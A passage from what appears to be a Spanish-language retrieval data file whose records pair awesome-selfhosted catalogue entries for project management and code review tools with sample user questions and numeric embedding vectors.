Tracking, and CI/CD. Simple yet Powerful [MIT, Java/Docker/K8S]. OpenProject β€” Manage your projects, tasks and goals. Collaborate via work packages and link them to your pull requests on Github [GPL-3.0, Ruby/deb/Docker]. Pagure β€” Lightweight, powerful, and flexible git-centric forge with features laying the foundation for federated and decentralized development [GPL-2.0, Docker/Python/deb]. Phorge β€” Community-driven platform for collaborating, managing, organizing and reviewing software development projects [Apache-2.0, PHP]. Plane β€” Track issues, epics, and product roadmaps in the simplest way possible (alternative to JIRA, Linear and Height) [AGPL-3.0, Docker]. ProjeQtOr β€” Complete, mature, multi-user project management system with extensive functionality for all phases of a project [AGPL-3.0, PHP]. Redmine β€” Flexible project management web application [GPL-2.0, Ruby].", "indexar": "que plataforma me sirve para gestionar proyectos y tareas en lugar de Jira", "v": [-0.07413, 0.12811, -0.22379, -0.24677, 0.09048, -0.09588, 0.01137, -0.01919, 0.00475, -0.0631, -0.04692, -0.04301, 0.13929, 0.0275, 0.12088, 0.07716, 0.17037, -0.04155, -0.01197, -0.04162, -0.13745, 0.0468, 0.05461, -0.01405, -0.1051, -0.06247, 0.10619, -0.16813, -0.09876, 0.06326, 0.02578, -0.05513, 0.11884, -0.10734, 0.09918, -0.01613, -0.01656, 0.04926, -0.04648, -0.04142, -0.05145, 0.07735, 0.005, -0.01728, 0.07286, 0.05105, 0.1468, -0.16207, -0.00659, 0.02241, -0.14296, -0.04766, -0.12599, 0.04087, 0.04707, -0.00465, 0.07964, -0.12494, -0.03587, -0.07378, -0.148, 0.05282, -0.07434, -0.05447, 0.06639, -0.00566, 0.02702, 0.08971, -0.08529, 0.0839, 0.07067, 0.07052, 0.02696, -0.13599, -0.01134, -0.04011, 0.02825, 0.01872, -0.02568, -0.05468, 0.06851, 0.03684, -0.12192, 0.05574, -0.02189, -0.10902, -0.04868, -0.06706, -0.00079, -0.04208, -0.05458, -0.0381, 0.00411, -0.05357, -0.03207, -0.02328, 0.04532, 0.05236, 0.01802, -0.05797, -0.03175, -0.02312, -0.04615, 0.0297, -0.06715, 0.14448, 0.02178, -0.01948, -0.01529, -0.06712, 0.03461, 0.00972, 0.05041, -0.02171, -0.06299, 0.00973, -0.04828, 0.02309, 0.05692, 0.02117, 0.0163, -0.07465, 0.04172, -0.01959, 0.07862, -0.00953, -0.00819, 0.04079, 0.06111, 0.02356, -0.01886, -0.03048, -0.0036, 0.03562, -0.00378, -0.0064, 0.08529, -0.00773, -0.0478, -0.08822, -0.03942, 0.07281, 0.01303, -0.07574, 0.06663, 0.00904, 0.07005, -0.04298, 0.07086, 0.03441, -0.01445, -0.03446, -0.03683, 0.04139, -0.05425, -0.04873, 0.03356, 0.04307, -0.094, 0.06643, -0.02644, -0.00015, -0.00429, 0.09611, -0.01766, -0.02751, -0.01154, 0.07521, 0.06916, 0.07551, -0.00572, 0.06464, 0.0217, -0.10502, 0.06873, -0.05239, -0.00174, -0.03283, 0.08544, -0.00428, -0.08626, -0.01905, 0.00802, 0.06923, 0.00259, -0.06104, 0.01056, -0.04507, -0.0536, 0.0969, -0.03427, 0.00314, -0.02707, -0.04073, 0.04333, -0.0103, -0.06158, -0.00105, -0.00723, -0.007, -0.0236, -0.02152, 0.03312, 0.01534, -0.07929, 0.05016, -0.00184, 0.04074, 0.05512, -0.0034, 0.02037, 0.00063, 0.0311, -0.06119, -0.02442, -0.04465, 0.04354, -0.05003, 0.00974, 0.00986, -0.04071, -0.0178, -0.01157, -0.02441, 0.04724, 0.04479, 0.09548, -0.01307, -0.01168, 0.00886, 0.03257, -0.00218, -0.0171, -0.01085, 0.03074, -0.08411, 0.00755, 0.01963, -0.04443, -0.00416, -0.01084, 0.03884, 0.02302, -0.02681, -0.03262, 0.01406, -0.06317, 0.04874, -0.03821, -0.04134, -0.10541, 0.02462, 0.06301, 0.04445, 0.00306, 0.00677]} -{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: OneDev β€” All-In-One DevOps Platform. With Git Management, Issue Tracking, and CI/CD. Simple yet Powerful [MIT, Java/Docker/K8S]. OpenProject β€” Manage your projects, tasks and goals. Collaborate via work packages and link them to your pull requests on Github [GPL-3.0, Ruby/deb/Docker]. Pagure β€” Lightweight, powerful, and flexible git-centric forge with features laying the foundation for federated and decentralized development [GPL-2.0, Docker/Python/deb]. Phorge β€” Community-driven platform for collaborating, managing, organizing and reviewing software development projects [Apache-2.0, PHP]. Plane β€” Track issues, epics, and product roadmaps in the simplest way possible (alternative to JIRA, Linear and Height) [AGPL-3.0, Docker]. ProjeQtOr β€” Complete, mature, multi-user project management system with extensive functionality for all phases of a project [AGPL-3.0, PHP]. Redmine β€” Flexible project management web application [GPL-2.0, Ruby].", "indexar": "con quΓ© programa puedo hacer seguimiento de issues y roadmaps de forma sencilla", "v": [0.01195, 0.18535, -0.15669, -0.10379, 0.03225, -0.10794, -0.01811, -0.04963, -0.09248, -0.02456, -0.09571, -0.01024, 0.05309, -0.10526, 0.04116, 0.04264, 0.0848, -0.05077, 0.02173, 0.02943, -0.05496, -0.07552, -0.11264, -0.00876, -0.00894, 0.05417, 0.09542, 0.01629, -0.06272, -0.06662, -0.02735, 0.03055, 0.02706, -0.01099, -0.1501, 0.05551, 0.067, 0.08256, -0.06364, -0.02646, -0.0751, -0.05438, 0.08524, 0.00074, 0.13922, -0.04887, 0.04393, -0.0407, -0.06094, -0.13012, 0.01701, -0.03031, -0.01982, -0.03009, 0.01184, -0.08348, 0.03464, -0.25498, -0.07991, -0.02388, 0.00343, 0.00505, 0.06427, -0.02488, 0.06765, -0.05811, 0.15084, -0.04863, 0.0011, 0.02514, 0.04217, -0.04721, 0.05475, -0.02286, -0.0209, 0.03937, -0.05234, -0.05688, -0.0196, 0.01219, 0.07814, 0.06703, 0.00742, 0.07071, -0.01106, 0.01183, -0.0294, 0.01343, -0.02761, -0.07778, -0.05165, 0.0623, 0.04973, 0.04882, -0.01074, -0.00021, 0.05505, 0.07492, -0.06098, -0.00101, 0.00124, -0.08888, -0.08983, 0.09379, -0.094, 0.05371, 0.06414, -0.01513, -0.07195, 0.14383, -0.0175, 0.09058, -0.08805, -0.04489, -0.09197, 0.01681, -0.0878, 0.12131, -0.00516, -0.08655, -0.05618, 0.11359, -0.13286, 0.00746, 0.14387, -0.01137, -0.03935, 0.13187, -0.0507, 0.02292, 0.03682, 0.00982, -0.04259, -0.03163, -0.02765, -0.00645, 0.00227, -0.01247, 0.05847, -0.02148, 0.02081, 0.03606, 0.00806, -0.03429, -0.03715, -0.0753, -0.00727, -0.08827, -0.02077, 0.07611, 0.03737, 0.03864, 0.02832, 0.0018, 0.02202, -0.08156, 0.06458, 0.03563, -0.00749, -0.02402, 0.00875, 0.04978, -0.05457, 0.02736, 0.12446, -0.04341, 0.07763, 0.07682, 0.10193, 0.04755, -0.04948, 0.10019, 0.09786, -0.1473, 0.0016, -0.06446, -0.07351, -0.09609, 0.03445, -0.03455, -0.11635, 0.10721, 0.12608, 0.06209, -0.01247, -0.0373, -0.10109, 0.04354, 0.02467, 0.00691, 0.01488, 0.01166, 0.02393, -0.03327, -0.02001, -0.00716, 0.04412, 0.08359, -0.0534, -0.05706, -0.0844, -0.04399, 0.06835, 0.01741, -0.02045, 0.10635, -0.05903, 0.01921, 0.0871, 0.07033, 0.02067, -0.0232, 0.09179, -0.01419, -0.0161, 0.00716, -0.05308, 0.04039, 0.03846, 0.04225, 0.02784, 0.04034, 0.0012, 0.03265, 0.01471, -0.01534, 0.02068, 0.02292, -0.00182, 0.00324, 0.00825, -0.05203, -0.01504, -0.00699, 0.00403, -0.0205, -0.08935, 0.01496, -0.00536, -0.02069, 0.02543, 0.06323, 0.03281, 0.01029, -0.02837, -0.04049, 0.00308, 0.00467, -0.05014, -0.03925, -0.02669, -0.0213, 0.05514, 0.02078, 0.02124, 0.00686]} -{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: OneDev β€” All-In-One DevOps Platform. With Git Management, Issue Tracking, and CI/CD. Simple yet Powerful [MIT, Java/Docker/K8S]. OpenProject β€” Manage your projects, tasks and goals. Collaborate via work packages and link them to your pull requests on Github [GPL-3.0, Ruby/deb/Docker]. Pagure β€” Lightweight, powerful, and flexible git-centric forge with features laying the foundation for federated and decentralized development [GPL-2.0, Docker/Python/deb]. Phorge β€” Community-driven platform for collaborating, managing, organizing and reviewing software development projects [Apache-2.0, PHP]. Plane β€” Track issues, epics, and product roadmaps in the simplest way possible (alternative to JIRA, Linear and Height) [AGPL-3.0, Docker]. ProjeQtOr β€” Complete, mature, multi-user project management system with extensive functionality for all phases of a project [AGPL-3.0, PHP]. Redmine β€” Flexible project management web application [GPL-2.0, Ruby].", "indexar": "cual es una alternativa libre a Linear o ProjeQtOr para gestionar el desarrollo", "v": [-0.23205, 0.04127, -0.01967, -0.11236, -0.02039, 0.00102, 0.02021, 0.0164, -0.16277, -0.06967, -0.0851, -0.18849, 0.02234, -0.0363, 0.08634, -0.0734, 0.10661, -0.07568, -0.06451, -0.01288, -0.14246, 0.13524, 0.0211, -0.13283, -0.02017, -0.03985, 0.0285, -0.13123, 0.00013, 0.07116, -0.00872, 0.02687, 0.10392, -0.01019, 0.06018, -0.01476, 0.04578, 0.0643, 0.12783, -0.02197, -0.09046, -0.02432, 0.03861, 0.16737, 0.15186, -0.03925, -0.00059, 0.02746, 0.06292, -0.03065, -0.09452, 0.11332, -0.00778, 0.07447, 0.17736, 0.02027, 0.03163, -0.11078, -0.02203, -0.00113, -0.01935, -0.05322, 0.01018, -0.15559, 0.11262, -0.00043, -0.09696, 0.06978, -0.08838, 0.03859, 0.06522, 0.09567, 0.02893, 0.047, -0.03433, 0.02639, 0.01146, 0.02223, -0.00659, 0.03075, 0.00598, 0.00415, -0.02829, 0.01996, -0.00622, -0.0572, 0.06444, -0.059, -0.05888, 0.05089, 0.02824, -0.04614, -0.02877, -0.05979, -0.06312, -0.12795, 0.08734, 0.04734, 0.10394, 0.00987, -0.04336, -0.01453, -0.12278, 0.06121, -0.00626, 0.06765, 0.01422, 0.02399, -0.06327, 0.01866, -0.06764, 0.03864, 0.07435, 0.02924, -0.05713, 0.0117, -0.06083, 0.01672, 0.01046, -0.0029, -0.01604, -0.04701, -0.00793, -0.0777, 0.03351, -0.00197, -0.00059, 0.08835, -0.00904, 0.07964, -0.04341, 0.00876, -0.06008, -0.09868, -0.12244, -0.001, 0.05541, 0.02404, 0.0655, -0.00978, -0.05702, 0.04772, -0.01084, 0.02219, 0.03907, -0.04075, 0.04554, -0.03637, 0.01539, -0.01928, 0.01287, 0.00727, 0.01227, 0.09911, -0.1277, -0.01348, -0.04333, 0.01578, 0.02102, 0.09128, 0.00536, -0.01911, -0.01209, 0.10592, 0.03288, -0.05184, -0.01224, 0.03453, -0.0246, 0.0085, 0.02534, 0.02446, 0.04639, -0.02276, 0.08888, -0.16904, 0.00673, -0.11777, 0.07787, -0.05161, -0.04032, 0.03714, -0.07583, 0.03168, -0.0256, -0.03328, -0.0069, -0.01494, 0.00992, 0.09272, -0.01758, -0.001, -0.03846, -0.10492, -0.05021, -0.01014, 0.02068, -0.08597, 0.00516, 0.02118, -0.03314, -0.03389, 0.05611, 0.01431, -0.00539, 0.03218, -0.01889, 0.067, 0.01628, 0.11599, 0.10996, 0.01766, 0.05935, -0.00119, -0.04948, 6e-05, 0.0117, -0.02463, 0.0377, -0.0115, -0.00766, 0.00355, 0.02352, 0.01499, 0.00178, 0.02805, -0.01448, 0.08376, -0.00172, 0.01683, 0.01325, 0.02092, -0.01368, 0.03708, 0.01416, 0.00971, 0.03829, -0.01914, -0.01107, -0.03851, 0.08872, 0.10029, -0.06518, 0.02085, -0.0739, -0.05065, -0.1153, 0.00235, -0.0526, -0.06874, -0.04232, 0.0287, 0.0275, 0.00369, 0.0589, -0.00451]} -{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Review Board β€” Extensible and friendly code review tool for projects and companies of all sizes [MIT, Python/Docker]. RhodeCode β€” Unify and simplify repository management for Git, Subversion, and Mercurial [AGPL-3.0, Python]. Rukovoditel β€” Configurable open source project management, web-based application [GPL-2.0, PHP]. SCM Manager β€” The easiest way to share and manage your Git, Mercurial and Subversion repositories over http [BSD-3-Clause, Java/deb/Docker/K8S]. ShipShipShip β€” Changelog and roadmap platform that bridges project management and customer communication [Apache-2.0, Docker]. Smederee β€” A frugal platform which is dedicated to help people build great software together leveraging the power of the Darcs version control system [AGPL-3.0, Scala]. Sourcehut β€” A full web git interface with no javascript [GPL-2.0, Go]. Taiga β€” Agile Project Management Tool based on the Kanban and Scrum methods [MPL-2.0, Docker/Python/Nodejs].", "indexar": "que programa sirve para hacer revisiones de cΓ³digo en proyectos?", "v": [0.01955, -0.01475, -0.13505, -0.21868, 0.06641, -0.24982, 0.05912, -0.02185, -0.0407, -0.13111, -0.01936, -0.13716, 0.05755, -0.17568, 0.06017, -0.01818, 0.14444, -0.05726, 0.09079, 0.0217, -0.01099, -0.00974, -0.02033, -0.02156, -0.02898, 0.02826, 0.02116, -0.03001, -0.02154, 0.00092, 0.02462, -0.0279, 0.09898, -0.02854, -0.07933, 0.08391, 0.17332, 0.05526, -0.06937, 0.0957, -0.01392, 0.00801, -0.03336, 0.00316, 0.05315, -0.07134, 0.13905, 0.05592, 0.02316, -0.03289, -0.0688, 0.01257, -0.05032, 0.05632, 0.08365, -0.077, -0.00809, -0.16144, -0.20053, 0.01405, 0.03108, -0.06823, 0.00426, -0.15033, 0.04598, -0.03366, 0.02754, 0.03609, -0.0428, 0.03063, -0.03102, 0.08609, 0.01964, -0.09566, -0.0398, -0.0395, 0.01138, -0.11667, -0.03123, -0.02147, -0.04645, 0.04852, -0.04591, 0.04185, -0.01186, -0.01839, -0.07044, -0.08186, 0.02232, -0.06238, 0.00838, 0.03, 0.02968, 0.03488, 0.06076, 0.01634, 0.13692, 0.07386, 0.08291, 0.03587, 0.05783, -0.15896, 0.03097, 0.05949, 0.02836, 0.12548, 0.13113, 0.01239, -0.02244, 0.06414, -0.07523, -0.0096, -0.10558, -0.07597, -0.12297, -0.01637, -0.04027, 0.03438, 0.02655, -0.07255, -0.07417, 0.00744, -0.11141, 0.05073, 0.03545, 0.05851, 0.01285, 0.09609, -0.0242, 0.03371, -0.05281, -0.00087, -0.02948, 0.0244, -0.072, -0.04749, 0.06272, 0.00658, 0.02134, 0.0418, -0.00307, 0.06456, 0.03544, 0.16733, 0.00768, 0.01728, 0.02302, -0.03499, -0.01233, -0.01426, 0.07338, 0.02811, -0.02564, 0.04592, -0.08058, -0.00749, 0.01792, -0.00205, -0.04297, 0.07142, -0.05772, 0.02072, 0.00662, -0.0668, 0.06337, -0.01945, -0.03242, 0.06039, 0.11874, 0.04074, 0.01601, 0.01712, 0.0938, -0.08126, 0.07495, -0.00103, 0.01804, -0.04997, -0.00195, -0.0305, -0.10552, 0.04816, 0.05335, 0.00535, 0.01968, -0.04897, 0.00915, 0.04769, 0.03408, -0.0107, -0.02284, -0.00393, -0.00823, 0.01627, -0.00058, 0.00709, 0.01899, 0.02668, 0.01189, -0.07963, -0.06412, -0.02124, 0.01648, -0.03103, 0.00206, 0.08527, 0.00312, -0.02016, 0.02627, 0.11656, 0.01856, -0.01249, 0.02052, 0.02167, -0.05644, -0.00446, 0.00176, 0.0657, 0.08215, 0.04163, -0.00696, -0.09734, -0.02204, 0.03606, 0.04108, -0.06816, 0.05128, 0.01929, 0.00786, 0.01391, 0.02898, -0.02708, -0.00467, 0.0037, 0.0603, -0.00666, -0.00647, 0.02779, -0.00254, -0.09489, -0.02767, 0.01652, -0.013, -0.01861, 0.01263, 0.0165, -0.01256, -0.03421, -0.00267, 0.02866, -0.07742, 0.01338, 0.0134, -0.04656, 0.0235, 0.03028]} -{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Review Board β€” Extensible and friendly code review tool for projects and companies of all sizes [MIT, Python/Docker]. RhodeCode β€” Unify and simplify repository management for Git, Subversion, and Mercurial [AGPL-3.0, Python]. Rukovoditel β€” Configurable open source project management, web-based application [GPL-2.0, PHP]. SCM Manager β€” The easiest way to share and manage your Git, Mercurial and Subversion repositories over http [BSD-3-Clause, Java/deb/Docker/K8S]. ShipShipShip β€” Changelog and roadmap platform that bridges project management and customer communication [Apache-2.0, Docker]. Smederee β€” A frugal platform which is dedicated to help people build great software together leveraging the power of the Darcs version control system [AGPL-3.0, Scala]. Sourcehut β€” A full web git interface with no javascript [GPL-2.0, Go]. Taiga β€” Agile Project Management Tool based on the Kanban and Scrum methods [MPL-2.0, Docker/Python/Nodejs].", "indexar": "con que puedo gestionar la gestion de mis repositorios Git y Subversion de forma sencilla?", "v": [0.00582, 0.0626, -0.08702, -0.20147, 0.0546, -0.03931, -0.04977, -0.02057, -0.06779, -0.01502, 0.02221, -0.03526, 0.01427, 0.01997, 0.13657, -0.00165, 0.0745, -0.14108, -0.15643, 0.0849, -0.01144, 0.02861, 0.21761, -0.10787, -0.0282, 0.05244, 0.13412, -0.10584, -0.01712, -0.02258, -0.00402, -0.04484, -0.09986, -0.13687, -0.15145, 0.11881, 0.00071, 0.07785, 0.04305, 0.02434, -0.07732, -0.04308, -0.0218, 0.05851, 0.05052, -0.1976, 0.15018, -0.05778, -0.05637, -0.01733, -0.08429, -0.0165, -0.08295, -0.04468, -0.04539, -0.06172, 0.07209, -0.18699, -0.03212, 0.01163, -0.06209, 0.0522, 0.02478, 0.05932, -0.0131, -0.01203, -0.00383, 0.02492, -0.16238, 0.05964, -0.08555, 0.06977, 0.00261, 0.0193, -0.00221, -0.05104, -0.00748, 0.02318, -0.06944, 0.0398, -0.00974, 0.01281, -0.01894, 0.01782, -0.03014, -0.11052, -0.06501, -0.06904, 0.02399, -0.04061, -0.10057, -0.21417, -0.09268, -0.12056, -0.05598, -0.02236, 0.00276, 0.00669, -0.06216, -0.05076, 0.0004, 0.06394, -0.09827, 0.11907, -0.04496, 0.12065, 0.04004, -0.10805, -0.03795, -0.02416, 0.01848, 0.02632, -0.01248, 0.00351, 0.05769, 0.12345, -0.03993, 0.02343, 0.00145, 0.01339, -0.03862, -0.12517, 0.03702, 0.0139, 0.12912, 0.02574, 0.0179, 0.05604, 0.03332, 0.02213, -0.05542, -0.05994, -0.00675, 0.00041, -0.01754, 0.04239, -0.00093, 0.01991, -0.02372, -0.10685, -0.06881, 0.11042, -0.01344, 0.00984, 0.08485, -0.07841, 0.05913, -0.0882, 0.06656, -0.00774, 0.0606, -0.08811, 0.05945, 0.05438, -0.05421, 0.03862, 0.02084, -0.01213, -0.04393, 0.02971, -0.00351, 0.0278, -0.07107, 0.05481, -0.01836, -0.05526, 0.00626, 0.09425, -0.02605, -0.02801, -0.04596, 0.03425, 0.05211, -0.0215, 0.05329, -0.10108, -0.06303, -0.10283, 0.02424, 0.01694, -0.00634, 0.00635, -0.0252, 0.0485, -0.00817, -0.03738, -0.02916, 0.03482, -0.0424, -0.03247, 0.06687, 0.04605, -0.0259, -0.04343, 0.08156, 0.03611, -0.02101, 0.04894, -0.06955, 0.02512, -0.00968, -0.05308, 0.03184, 0.03679, -0.02582, 0.02803, -0.07672, 0.05719, 0.03781, 0.00761, 0.01507, 0.01652, 0.01831, -0.04004, -0.01715, -0.01693, -0.00861, 0.02552, 0.01482, -0.04572, -0.01011, -0.02317, 0.07268, 0.0132, -0.02254, -0.02349, -0.01218, 0.02617, -0.03768, 0.02619, -0.00146, 0.03746, 0.01109, -0.00471, 0.01408, -0.02308, -0.00362, 0.02487, -0.0355, 0.01723, -0.0187, 0.03251, 0.02934, -0.02239, -0.04509, 0.01079, -0.06895, 0.05448, -0.02104, -0.0102, -0.00129, -0.02703, -0.0074, -0.01841, -0.03862, -0.02862]} -{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Review Board β€” Extensible and friendly code review tool for projects and companies of all sizes [MIT, Python/Docker]. RhodeCode β€” Unify and simplify repository management for Git, Subversion, and Mercurial [AGPL-3.0, Python]. Rukovoditel β€” Configurable open source project management, web-based application [GPL-2.0, PHP]. SCM Manager β€” The easiest way to share and manage your Git, Mercurial and Subversion repositories over http [BSD-3-Clause, Java/deb/Docker/K8S]. ShipShipShip β€” Changelog and roadmap platform that bridges project management and customer communication [Apache-2.0, Docker]. Smederee β€” A frugal platform which is dedicated to help people build great software together leveraging the power of the Darcs version control system [AGPL-3.0, Scala]. Sourcehut β€” A full web git interface with no javascript [GPL-2.0, Go]. Taiga β€” Agile Project Management Tool based on the Kanban and Scrum methods [MPL-2.0, Docker/Python/Nodejs].", "indexar": "cuales son las herramientas para el desarrollo Γ‘gil basadas en metodologias como Scrum o Kanban?", "v": [-0.04938, -0.07456, 0.02385, -0.00816, -0.10359, -0.16405, -0.04466, -0.0196, -0.11419, 0.01275, -0.04621, -0.02627, -0.05048, -0.09362, 0.11681, -0.03372, -0.04604, -0.22945, -0.1043, 0.12948, -0.0401, -0.01688, -0.09295, -0.02652, -0.07959, -0.04984, 0.08343, -0.03173, -0.07221, 0.09089, 0.01312, 0.1098, 0.07725, -0.07999, -0.07153, -0.04339, -0.08, -0.00291, -0.04974, 0.14448, -0.18634, -0.11109, -0.04234, 0.02424, 0.08271, -0.05528, -0.08514, 0.06511, -0.14123, 0.05406, -0.06108, 0.00123, 0.06151, -0.07615, 0.05366, -0.14369, 0.08629, -0.14817, -0.01668, -0.01056, -0.03279, 0.04934, 0.02668, -0.08198, 0.03496, -0.09884, -0.05966, 0.00611, -0.19637, 0.03605, 0.06574, 0.01755, -0.0084, -0.02283, 0.0326, 0.012, -0.0301, 0.13512, -0.02508, -0.02689, 0.03438, -0.07186, -0.03306, 0.07738, -0.13719, -0.02653, 0.04898, -0.11074, 0.00687, -0.03376, -0.02346, -0.03855, -0.00726, 0.0473, -0.08861, -0.08857, 0.05725, -0.01668, 0.13154, -0.0007, -0.09354, -0.041, -0.04756, 0.06657, -0.0516, -0.03835, 0.00197, 0.00714, -0.03062, -0.00703, -0.0269, 0.10589, 0.06974, 0.07862, -0.03285, -0.00292, 0.04222, -0.04209, -0.01004, -0.08575, 0.03285, 0.00051, -0.03432, -0.02466, 0.02311, -0.07327, -0.00652, 0.06078, 0.08831, -0.01605, 0.02234, -0.03973, -0.08107, 0.00083, 0.05395, 0.03784, 0.06533, -0.0077, -0.05395, -0.06193, 0.0385, 0.00414, -0.01402, -0.07958, 0.08535, -0.03004, 0.05311, -0.03127, -0.03471, -0.07609, 0.00281, 0.00955, 0.08103, 0.06824, -0.15624, -0.14657, 0.03593, -0.00255, -0.11342, 0.12687, 0.0287, -0.04813, -0.03886, -0.01462, 0.05749, -0.04149, 0.0169, 0.07335, 0.03566, 0.02386, 0.02628, 0.07317, 0.05199, -0.05275, 0.06226, 0.01222, -0.06073, -0.02333, 0.01147, -0.00834, -0.00635, 0.07668, -0.01126, -0.00172, 0.04623, -0.04779, -0.00752, -0.03281, 0.0202, 0.0997, -0.04236, -0.01068, -0.0358, -0.0567, -0.01745, -0.04573, -0.00687, 0.045, -0.01095, -0.04519, -0.05287, -0.00855, -0.04109, -0.03334, 0.01663, 0.05929, -0.05914, -0.00326, -0.06472, 0.05961, 0.02174, 0.03135, 0.0291, -0.00342, -0.03716, -0.04552, -0.06961, -0.06938, 0.02218, 0.01723, -0.00087, 0.00655, 0.03177, -0.01568, -0.02509, 0.05591, -0.00855, 0.02372, 0.03226, -0.0374, -0.00478, -0.01173, -0.08161, -0.00537, -0.03339, 0.02021, 0.05822, -0.02125, -0.04368, -0.0284, -0.00269, 0.04387, -0.01998, -0.02823, -0.07455, -0.03896, -0.05438, -0.02097, 0.00218, -0.08696, -0.03252, -0.01179, 0.04492, -0.02916, -0.02724, -0.08249]} -{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Titra β€” Time-tracking solution for freelancers and small teams [GPL-3.0, Javascript/Docker]. Trac β€” Trac is an enhanced wiki and issue tracking system for software development projects [BSD-3-Clause, Python/deb]. Traq β€” Project management and issue tracking system written in PHP [GPL-3.0, PHP/Nodejs]. Tuleap β€” Tuleap is a libre suite to plan, track, code and collaborate on software projects [GPL-2.0, PHP]. UVDesk β€” UVDesk community is a service oriented, event driven extensible opensource helpdesk system that can be used by your organization to provide efficient support to your clients effortlessly whichever way you imagine [MIT, PHP]. ZenTao β€” An agile(scrum) project management system/tool [AGPL-3.0, PHP].", "indexar": "ΒΏhay algΓΊn programa para gestionar tareas y seguimiento de incidencias en proyectos de software?", "v": [-0.06208, 0.20683, -0.13294, -0.25093, 0.06025, -0.13149, -0.01675, -0.0199, -0.03318, -0.00465, -0.07194, 0.00538, 0.05292, -0.031, 0.04518, 0.09544, 0.15147, -0.11666, 0.01599, 0.06693, -0.11767, 0.07089, -0.0231, 0.03143, -0.07114, -0.03749, -0.05652, -0.10034, -0.06841, 0.03949, 0.01476, -0.02285, 0.11655, -0.14304, -0.01709, 0.02948, 0.00259, 0.03245, 0.05816, -0.01222, 0.02057, -0.03207, -0.04293, -0.01712, 0.19684, -0.07902, 0.07156, -0.05863, 0.0195, -0.09474, -0.05772, -0.01207, -0.00527, -0.05629, 0.06336, -0.08993, -0.00307, -0.13537, -0.03827, -0.09891, -0.05869, 0.1071, -0.01873, -0.0341, 0.05215, -0.06974, 0.12014, -0.03749, -0.04737, 0.08737, 0.01073, 0.00445, -0.0306, -0.03443, 0.04985, -0.0258, 0.00196, -0.01785, -0.08853, -0.05082, -0.03667, 0.06615, 0.00492, 0.06316, -0.08478, -0.06384, 0.02558, -0.05621, 0.00912, -0.03487, -0.03886, 0.04902, -0.07344, 0.02762, -0.00401, 0.0576, 0.14049, 0.03137, 0.01579, 0.10342, -0.04296, -0.09202, -0.02222, 0.07425, -0.10593, 0.15352, 0.0244, -0.02679, -0.01082, 0.07226, -0.06138, 0.02988, 0.00917, -0.05297, -0.09187, 0.02473, -0.01611, -0.02562, 0.06679, -0.10059, -0.03284, 0.02534, 0.00498, 0.01247, 0.10515, -0.05741, -0.00522, 0.12268, -0.03215, 0.05295, -0.0001, -0.04338, -0.03182, -0.00267, -0.03832, 0.00708, 0.03517, -0.00969, -0.03136, -0.00954, -0.08763, 0.06717, 0.03923, 0.06706, 0.09412, 0.02493, -0.00154, -0.05256, 0.04753, 0.04536, 0.08904, -0.01654, 0.00168, 0.03192, -0.01147, -0.01692, 0.06439, 0.04532, -0.03523, 0.01237, -0.05845, 0.04543, -0.01292, 0.01258, 0.017, -0.06064, 0.01774, 0.09024, 0.08664, 0.09268, -0.08579, 0.05647, 0.02148, -0.11755, 0.03315, -0.10507, 0.0013, -0.11157, 0.05473, -0.01972, -0.1091, 0.04878, 0.10914, 0.06462, 0.03733, -0.02744, -0.08549, 0.07408, -0.03755, 0.04028, 0.00317, 0.01095, -0.02156, -0.07371, 0.05187, 0.01106, -0.02878, 0.03312, 0.00395, -0.00272, -0.06067, -0.03375, 0.05105, 0.04275, -0.0313, 0.11083, -0.01867, 0.07588, 0.08057, 0.11044, 0.02916, 0.00303, 0.01759, 0.03845, -0.04648, -0.0412, 0.00885, 0.0177, 0.08612, 0.01581, 0.00867, -0.03542, 0.04475, 0.03213, 0.04661, -0.03432, 0.06182, 0.07154, 0.02217, 0.0205, -0.01351, -0.04211, -0.00254, -0.03074, 0.0171, -0.05528, -0.00475, -0.01698, 0.0018, -0.06115, -0.01004, 0.06642, 0.07432, -0.04119, -0.08269, 0.02909, -0.03107, 0.0292, -0.03094, 0.00948, -0.06053, 0.03246, 0.00517, -0.00016, 0.05368, 0.00293]} -{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Titra β€” Time-tracking solution for freelancers and small teams [GPL-3.0, Javascript/Docker]. Trac β€” Trac is an enhanced wiki and issue tracking system for software development projects [BSD-3-Clause, Python/deb]. Traq β€” Project management and issue tracking system written in PHP [GPL-3.0, PHP/Nodejs]. Tuleap β€” Tuleap is a libre suite to plan, track, code and collaborate on software projects [GPL-2.0, PHP]. UVDesk β€” UVDesk community is a service oriented, event driven extensible opensource helpdesk system that can be used by your organization to provide efficient support to your clients effortlessly whichever way you imagine [MIT, PHP]. ZenTao β€” An agile(scrum) project 